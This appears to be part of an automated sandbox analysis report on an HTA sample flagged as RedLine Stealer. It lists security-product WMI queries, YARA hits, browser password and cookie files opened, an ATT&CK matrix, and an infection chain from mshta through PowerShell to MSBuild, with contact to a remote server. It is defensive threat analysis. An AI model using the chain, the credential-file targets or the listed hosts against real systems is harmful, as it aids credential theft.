                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.1898870666.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1973071322.00000000053C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.1755407197.0000000005984000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.1976845704.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.1898510626.0000000005204000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1901630344.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.1754103601.0000000005C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1972605812.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1728, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 1296, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: AutoIt3.exeBinary or memory string: WIN_81
                    Source: AutoIt3.exeBinary or memory string: WIN_XP
                    Source: AutoIt3.exeBinary or memory string: WIN_XPe
                    Source: AutoIt3.exeBinary or memory string: WIN_VISTA
                    Source: AutoIt3.exeBinary or memory string: WIN_7
                    Source: AutoIt3.exeBinary or memory string: WIN_8
                    Source: AutoIt3.exe, 00000015.00000003.1971061934.000000000573B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.1898870666.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1973071322.00000000053C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.1755407197.0000000005984000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.1976845704.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.1898510626.0000000005204000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1901630344.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.1754103601.0000000005C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1972605812.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1728, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 1296, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.1898870666.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1973071322.00000000053C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.1755407197.0000000005984000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.1976845704.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.1898510626.0000000005204000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1901630344.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.1754103601.0000000005C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1972605812.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1728, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 1296, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0103696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,14_2_0103696E
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01036E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,14_2_01036E32
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A1696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,16_2_00A1696E
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A16E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00A16E32

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		21
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    Create Account                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		121
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter                    		2
                    Valid Accounts                    		2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		11
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts3
                    PowerShell                    		1
                    Registry Run Keys / Startup Folder                    		21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS159
                    System Information Discovery                    		Distributed Component Object Model121
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets251
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		Cached Domain Credentials241
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items241
                    Virtualization/Sandbox Evasion                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576532 Sample: payload_1.hta Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 56 nopaste.net 2->56 58 x1.i.lencr.org 2->58 60 7 other IPs or domains 2->60 74 Multi AV Scanner detection for domain / URL 2->74 76 Suricata IDS alerts for network traffic 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 6 other signatures 2->80 10 mshta.exe 1 2->10         started        13 AutoIt3.exe 2->13         started        15 AutoIt3.exe 2->15         started        signatures3 process4 signatures5 82 Suspicious powershell command line found 10->82 17 powershell.exe 18 20 10->17         started        21 MSBuild.exe 13->21         started        23 MSBuild.exe 13->23         started        25 MSBuild.exe 15->25         started        process6 dnsIp7 52 google.com 142.250.181.142, 443, 49714, 49715 GOOGLEUS United States 17->52 54 www.google.com 172.217.19.228, 443, 49717, 49731 GOOGLEUS United States 17->54 68 Suspicious powershell command line found 17->68 70 Bypasses PowerShell execution policy 17->70 72 Powershell drops PE file 17->72 27 powershell.exe 19 17->27         started        31 Acrobat.exe 59 17->31         started        33 conhost.exe 17->33         started        signatures8 process9 dnsIp10 64 nopaste.net 174.138.125.138, 443, 49710 DIGITALOCEAN-ASNUS United States 27->64 66 docu-signer.com 104.21.87.65, 443, 49713, 49728 CLOUDFLARENETUS United States 27->66 50 C:\Users\user\AppData\Local\...\updater.exe, PE32 27->50 dropped 35 updater.exe 27->35         started        38 conhost.exe 27->38         started        40 AcroCEF.exe 109 31->40         started        file11 process12 file13 48 C:\faggbgb\AutoIt3.exe, PE32 35->48 dropped 42 MSBuild.exe 35->42         started        46 AcroCEF.exe 6 40->46         started        process14 dnsIp15 62 185.147.124.236, 15647, 49735, 49737 E-STYLEISP-ASRU Russian Federation 42->62 84 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 42->84 86 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 42->86 88 Contains functionality to register a low level keyboard hook 42->88 90 Tries to harvest and steal browser information (history, passwords, etc) 42->90 signatures16

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.